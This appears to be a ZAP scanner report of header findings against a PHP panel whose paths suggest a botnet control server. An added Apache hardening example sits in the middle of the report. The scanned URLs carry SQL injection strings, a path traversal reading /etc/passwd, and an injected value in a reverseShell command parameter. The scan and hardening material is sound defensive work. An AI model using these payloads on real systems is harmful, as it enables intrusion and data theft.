If possible, ensure that the end user uses a standards-compliant and modern web browser that supports the Cross-Origin-Resource-Policy header (https://caniuse.com/mdn-http_headers_cross-origin-resource-policy).
Reference https://developer.mozilla.org/en-US/docs/Web/HTTP/Cross-Origin_Resource_Policy
Tags OWASP_2021_A04
OWASP_2017_A03
CWE Id 693
WASC Id 14
Plugin Id 90004
Low
Permissions Policy Header Not Set
Description
The Permissions-Policy header is an added layer of security that restricts which browser/client features a page and the resources it embeds may use. It protects user privacy by letting the site owner limit, or explicitly specify, the browser features available to web resources. Permissions-Policy is a standard HTTP header through which a site owner declares which features a page is allowed to use, such as camera, microphone, location and full screen.
URL http://142.202.242.172
Method GET
Parameter
Attack
Evidence
Request Header - size: 148 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/
Method GET
Parameter
Attack
Evidence
Request Header - size: 149 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/robots.txt
Method GET
Parameter
Attack
Evidence
Request Header - size: 159 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/sitemap.xml
Method GET
Parameter
Attack
Evidence
Request Header - size: 160 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS
Method GET
Parameter
Attack
Evidence
Request Header - size: 165 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/
Method GET
Parameter
Attack
Evidence
Request Header - size: 626 bytes.
Request Body - size: 0 bytes.
Response Header - size: 241 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54
Method GET
Parameter
Attack
Evidence
Request Header - size: 718 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 12,091 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter
Attack
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 17,675 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/gate.php?bot=DESKTOP-95IQEEV
Method GET
Parameter
Attack
Evidence
Request Header - size: 566 bytes.
Request Body - size: 0 bytes.
Response Header - size: 252 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter
Attack
Evidence
Request Header - size: 175 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method GET
Parameter
Attack
Evidence
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG
Method GET
Parameter
Attack
Evidence
Request Header - size: 379 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method GET
Parameter
Attack
Evidence
Request Header - size: 197 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter
Attack
Evidence
Request Header - size: 393 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qifoo.php?file=../../../../../../../etc/passwd
Method GET
Parameter
Attack
Evidence
Request Header - size: 290 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter
Attack
Evidence
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter
Attack
Evidence
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter
Attack
Evidence
Request Header - size: 741 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter
Attack
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 365 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects
Method GET
Parameter
Attack
Evidence
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter
Attack
Evidence
Request Header - size: 478 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?customArgs=&dllFunction=&limit=&params=*&task_select=8&unit_EXEC=18.9
Method GET
Parameter
Attack
Evidence
Request Header - size: 709 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter
Attack
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 367 bytes.
Response Body - size: 14,616 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27
Method GET
Parameter
Attack
Evidence
Request Header - size: 468 bytes.
Request Body - size: 0 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter
Attack
Evidence
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54&task_select=1&params=%27+UNION+SELECT+%40%40version+--+-&unit_EXEC=18.9&limit=%27+UNION+SELECT+%40%40version+--+-&dllFunction=&customArgs=
Method GET
Parameter
Attack
Evidence
Request Header - size: 972 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/xampp/
Method GET
Parameter
Attack
Evidence
Request Header - size: 189 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method POST
Parameter
Attack
Evidence
Request Header - size: 247 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter
Attack
Evidence
Request Header - size: 603 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter
Attack
Evidence
Request Header - size: 533 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method POST
Parameter
Attack
Evidence
Request Header - size: 479 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter
Attack
Evidence
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
Instances 50
Solution
Ensure that your web server, application server, load balancer, etc. is configured to set the Permissions-Policy header.
Reference https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Permissions-Policy
https://developer.chrome.com/blog/feature-policy/
https://scotthelme.co.uk/a-new-security-header-feature-policy/
https://w3c.github.io/webappsec-feature-policy/
https://www.smashingmagazine.com/2018/12/feature-policy/
Tags OWASP_2021_A01
OWASP_2017_A05
CWE Id 693
WASC Id 15
Plugin Id 10063
Low
Server Leaks Information via "X-Powered-By" HTTP Response Header Field(s)
Description
The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 718 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 12,091 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 17,675 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/gate.php?bot=DESKTOP-95IQEEV
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 566 bytes.
Request Body - size: 0 bytes.
Response Header - size: 252 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 175 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 379 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 197 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 393 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qifoo.php?file=../../../../../../../etc/passwd
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 290 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 741 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 365 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 792 bytes.
Request Body - size: 0 bytes.
Response Header - size: 441 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 389 bytes.
Response Body - size: 131 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?customArgs=&dllFunction=&limit=&params=*&task_select=8&unit_EXEC=18.9
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 709 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 367 bytes.
Response Body - size: 14,616 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 468 bytes.
Request Body - size: 0 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54&task_select=1&params=%27+UNION+SELECT+%40%40version+--+-&unit_EXEC=18.9&limit=%27+UNION+SELECT+%40%40version+--+-&dllFunction=&customArgs=
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 972 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method POST
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 247 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 603 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 533 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method POST
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 479 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
Instances 27
Solution
Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.
Reference https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/01-Information_Gathering/08-Fingerprint_Web_Application_Framework
https://www.troyhunt.com/2012/02/shhh-dont-let-your-response-headers.html
Tags OWASP_2021_A01
WSTG-v42-INFO-08
OWASP_2017_A03
CWE Id 200
WASC Id 13
Plugin Id 10037
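The four header findings in this report (the "Server" version string, the "X-Powered-By" header, the missing Cross-Origin-Resource-Policy header and the missing Permissions-Policy header) all come down to a few Apache and PHP settings. The configuration below is an added example, not part of the ZAP report and not the scanned panel's own configuration. It assumes a stock Apache 2.4 httpd.conf on Windows with mod_headers available (the XAMPP layout implied by the "Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12" evidence and the /xampp/ path in this report); the docroot path C:/xampp/htdocs is an assumption. The "before" block lists the defaults that produce the evidence shown above; the "after" block is the corrected configuration.

```apache
# Added example, not from the ZAP report or the scanned panel's configuration.
# Assumes a stock Apache 2.4 httpd.conf on Windows (XAMPP-style layout) with
# mod_headers available. Paths marked (assumed) are not taken from the report.

# --- Before: the defaults behind the evidence in this report ---------------
# ServerTokens Full          -> "Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12"
# ServerSignature On         -> "Apache/2.4.58" footer on the 404 pages (robots.txt, sitemap.xml)
# expose_php = On (php.ini)  -> "X-Powered-By: PHP/8.2.12" on every .php response
# (no Cross-Origin-Resource-Policy and no Permissions-Policy header at all)

# --- After: put in httpd.conf (or the panel's <Directory> / .htaccess) ------
# Uncomment if mod_headers is not already loaded; Apache skips a duplicate load.
# LoadModule headers_module modules/mod_headers.so

# "Server" header and error-page footer (plugin 10009 and the Server version
# leak). Prod is the least Apache will send; the product name "Apache" remains.
ServerTokens Prod
ServerSignature Off

# X-Powered-By (plugin 10037). The real fix is "expose_php = Off" in php.ini,
# which stops PHP adding the header at all; the unset is a fallback for when
# php.ini is not under your control.
Header unset X-Powered-By

# Cross-Origin-Resource-Policy (plugin 90004). same-origin site-wide, which
# also covers static files such as Sound Effects/error.wav. Only a path that
# other sites deliberately embed should get "cross-origin", and only there.
Header always set Cross-Origin-Resource-Policy "same-origin"

# Permissions-Policy (plugin 10063). Deny the sensitive features a panel never
# needs; add a feature back with (self) only if a page legitimately uses it.
Header always set Permissions-Policy "camera=(), microphone=(), geolocation=(), payment=(), usb=(), fullscreen=(self)"

# Not one of the header findings, but the "?C=N;O=A" sort links on / and
# /xampp/ in this report are mod_autoindex output, i.e. directory listing is
# enabled. Turn it off for the docroot (path assumed).
<Directory "C:/xampp/htdocs">
    Options -Indexes
</Directory>
```

After restarting Apache, confirm the change with a HEAD request to a 404 path such as /robots.txt and to a PHP page such as login.php: the Server header should read only "Apache", X-Powered-By should be absent, and both Cross-Origin-Resource-Policy and Permissions-Policy should be present on every response, error pages included (that is what "Header always" buys over plain "Header set"). Note that "Header unset" removes X-Powered-By from successful responses only; "expose_php = Off" is what removes it everywhere.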
Low
Server Leaks Version Information via "Server" HTTP Response Header Field
Description
The web/application server is leaking version information via the "Server" HTTP response header. Access to such information may facilitate attackers identifying other vulnerabilities your web/application server is subject to.
URL http://142.202.242.172
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 148 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 149 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=A
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=D
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=A
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=D
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=A
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=D
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=A
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=D
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/robots.txt
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 159 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/sitemap.xml
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 160 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 165 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/
